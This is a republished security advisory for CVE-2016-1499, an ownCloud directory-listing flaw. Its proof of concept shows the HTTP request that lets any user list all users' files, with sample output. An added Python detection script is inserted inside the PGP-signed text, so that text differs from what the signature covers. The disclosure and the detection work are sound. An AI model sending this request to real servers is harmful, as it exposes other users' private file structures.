ownCloud 8.2.1 / 8.1.4 / 8.0.9 Information Exposure

2016-01-07T00:00:00
ID PACKETSTORM:135158
Type packetstorm
Reporter Dr. Erlijn van Genuchten
Modified 2016-01-07T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2015-062  
Product: ownCloud  
Manufacturer: ownCloud Inc., Community  
Affected Version(s): ownCloud <= 8.2.1, <= 8.1.4, <= 8.0.9  
Tested Version(s): 8.1.1, 8.1.4  
Vulnerability Type: Information Exposure Through Directory Listing (CWE-548)  
Risk Level: Medium  
Solution Status: Fixed  
Manufacturer Notification: 2015-07-17  
Solution Date: 2015-12-23  
Public Disclosure: 2016-01-06  
CVE Reference: CVE-2016-1499  
Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
ownCloud is a software suite for creating and using file hosting  
services.  
  
The ownCloud Web site describes the software as follows (see [1]):  
  
"ownCloud is a self-hosted file sync and share server. It provides access   
to your data through a web interface, sync clients or WebDAV while   
providing a platform to view, sync and share across devices easily — all   
under your control. ownCloud’s open architecture is extensible via a   
simple but powerful API for applications and plugins and it works with   
any storage."  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
ownCloud is vulnerable to information exposure through directory  
listing. An authenticated normal (non-administrative) user can obtain  
the complete directory structure, including the contained file names,  
of all users. The 'force' parameter of the script  
index.php/apps/files/ajax/scan.php is not restricted and can simply be  
set to 'true'.  
  
This vulnerability can also be used for denial-of-service attacks if  
the selected directory tree is deep enough, because indexing a large  
number of directories requires considerable computational effort. In  
addition, sensitive information belonging to other users is exposed.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
With the following HTTP GET request, it is possible to see the  
directories of other users.  
  
  
GET /index.php/apps/files/ajax/scan.php?force=true&dir=&requesttoken=<VALIDREQUESTTOKEN> HTTP/1.1  
Host: [HOST]  
Accept: text/event-stream  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: [REFERER]  
Cookie: [COOKIES]  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
  
Server response (shortened):  
  
event: user  
data: "[ID]"  
  
event: folder  
data: "\/"  
  
event: count  
data: 21  
  
event: count  
data: 42  
  
event: count  
data: 63  
  
event: folder  
data: "\/[ID]"  
  
event: folder  
data: "\/[ID]\/cache"  
  
event: folder  
data: "\/[ID]6\/files"  
  
event: folder  
data: "\/[ID]\/files_encryption"  
  
[...]  
  
event: folder  
data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].zip"  
  
event: folder  
data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].zip\/OC_DEFAULT_MODULE"  
  
event: folder  
data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].pptx"  
  
[...]  
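As an added example (not part of the SySS advisory or of ownCloud's own code), the following Python script shows two defender-side checks for the issue described above: a filter over web-server access-log lines that flags requests to apps/files/ajax/scan.php carrying force=true, which is the request pattern of the PoC, and a parser for the text/event-stream response that reports every 'folder' path lying outside the requesting user's own home directory. On a patched server the second check should return nothing. The log format, IP addresses, user names and paths are constructed sample data.

```python
"""Defender-side checks for the ownCloud scan.php directory-listing issue
(CVE-2016-1499, SYSS-2015-062). Added example; not advisory or ownCloud code."""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in the common combined-log layout.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jan/2016:10:00:01 +0100] "GET /index.php/apps/files/ajax/scan.php?force=true&dir=&requesttoken=abc HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.6 - - [06/Jan/2016:10:00:02 +0100] "GET /index.php/apps/files/ajax/list.php?dir=%2F HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [06/Jan/2016:10:00:03 +0100] "GET /index.php/apps/files/ajax/scan.php?force=false&dir=%2FDocuments HTTP/1.1" 200 256 "-" "Mozilla/5.0"
10.0.0.8 - - [06/Jan/2016:10:00:04 +0100] "GET /index.php/apps/files/ajax/scan.php?dir=&force=True HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method and request target of a combined-log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)


def flag_scan_requests(log_text):
    """Return (ip, timestamp, dir) for every scan.php request with force=true.

    The value is compared case-insensitively so that spelling variants of
    'true' are not missed; an empty 'dir' is the whole-storage scan from the PoC.
    """
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/apps/files/ajax/scan.php"):
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)
        force = qs.get("force", [""])[0].lower()
        if force == "true":
            hits.append((m.group("ip"), m.group("ts"), qs.get("dir", [""])[0]))
    return hits


# Constructed text/event-stream body in the shape the advisory reproduces;
# JSON strings escape '/' as '\/' just like the real response.
SAMPLE_STREAM = """\
event: user
data: "alice"

event: folder
data: "\\/"

event: count
data: 21

event: folder
data: "\\/alice"

event: folder
data: "\\/alice\\/files"

event: folder
data: "\\/bob"

event: folder
data: "\\/bob\\/files_encryption\\/keys\\/files\\/report.zip"
"""


def parse_event_stream(text):
    """Yield (event, data) pairs from a text/event-stream body.

    Events are separated by blank lines; several 'data:' lines are joined.
    """
    event, data = None, []
    for line in text.splitlines():
        if line.startswith("event:"):
            event = line[len("event:"):].strip()
        elif line.startswith("data:"):
            data.append(line[len("data:"):].strip())
        elif line == "":
            if event is not None or data:
                yield event, "\n".join(data)
            event, data = None, []
    if event is not None or data:
        yield event, "\n".join(data)


def leaked_paths(stream_text, requesting_user):
    """Return 'folder' paths in a scan response that lie outside /<requesting_user>.

    The storage root '/' and the user's own home tree are expected; anything
    else means the scan walked another user's directories.
    """
    home = "/" + requesting_user
    leaked = []
    for event, data in parse_event_stream(stream_text):
        if event != "folder":
            continue
        path = json.loads(data)  # decodes "\/" escapes back to "/"
        if path == "/" or path == home or path.startswith(home + "/"):
            continue
        leaked.append(path)
    return leaked


if __name__ == "__main__":
    for ip, ts, directory in flag_scan_requests(SAMPLE_LOG):
        print(f"forced scan from {ip} at {ts}, dir={directory!r}")
    for path in leaked_paths(SAMPLE_STREAM, "alice"):
        print("path outside alice's home:", path)
```

The log check is a triage aid rather than proof of exploitation: scan.php with force=true is also what a legitimate rescan may send, so the interesting signals are an empty dir from a non-administrative session and a large response size, as in the first and last sample lines. The response check is the one to run after applying the fixed releases, since a patched server should confine the walk to the requesting user's own tree.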
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
According to ownCloud, the described security issue has been fixed in  
the following software releases:  
– ownCloud 8.2.2  
– ownCloud 8.1.5  
– ownCloud 8.0.10  
  
Please contact the manufacturer for further information or support or   
visit https://owncloud.org/security/advisory/?id=oc-sa-2016-002.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2015-11-17: Vulnerability reported to manufacturer  
2015-12-23: Patch published by manufacturer  
2016-01-06: Public release of security advisory  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] ownCloud, Web Site  
https://owncloud.org/  
[2] SySS Security Advisory SYSS-2015-062  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-062.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/news/responsible-disclosure-policy/  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Dr. Erlijn van Genuchten of the  
SySS GmbH.  
  
E-Mail: erlijn.vangenuchten@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc  
Key ID: 0xBD96FF2A  
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is" and   
without warranty of any kind. Details of this security advisory may be updated   
in order to provide as accurate information as possible. The latest version of   
this security advisory is available on the SySS Web site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1  
  
iQIcBAEBCgAGBQJWjiHkAAoJEAylhje9lv8qzJYP/jCxIJ64SWR8lKEvZxEQDSbr  
L0XBUOBCtl1K0BQnTVXrSOq5lph8VPfJGdxkC35QWDX9zt1mGJxDqvRuC8ugG5ZU  
SqnAimeXWOCeNuZOFWjiynKntxbmqSVfSKws2ZwvR7TYWz8t5n2igflfeIgeHtie  
Z5lMPWTAzrU6qcDP1zJBG4hnVIuDorDqsMvuDFY0SSzZgBf+nJ5ovE8P6kvnYs90  
eEtZ91oZaGICfGuSaLYu0/GOQ34Ww2v9/9CQyBVukaySJX51d02putfqfnYxZPSx  
TrkWPwc9BUGZF0VK+1qwgP0+hr67yz7+ypCQ6KdmHz6chPIlyVk/fAo9X/weuTlA  
H2n78Pb1ICHRlsSa8gyVFOJeTTqsmF9AAIWeT5TrcXHlNK2FY46Vl21jxFtNtjeN  
wdTfzVGvwJjIDkq6iikg4/yaz3xduCilfJd8vKf1MNki/4Lw1oT+5KGuHJQPAPTD  
3nvN+gU4qJxRt2YPaXEvIavpFszkG0GCqZJ5BX7B4b8zW15fl+E5W/ewp95J9FWS  
x+s4Vn/7uvrtOpNAcUq0HPLbG5OtgM4DyHceZoQlz1g5fsh8gbrSM7ZKQjKTS3Vb  
+MGCAXdwTNwa/cka5WKT16/2959uwTRZO8jQloINfWOwUyweC+JIYPZ2OQsmxLop  
ceqeLBdlztCJvqeu5rJY  
=tGfZ  
-----END PGP SIGNATURE-----  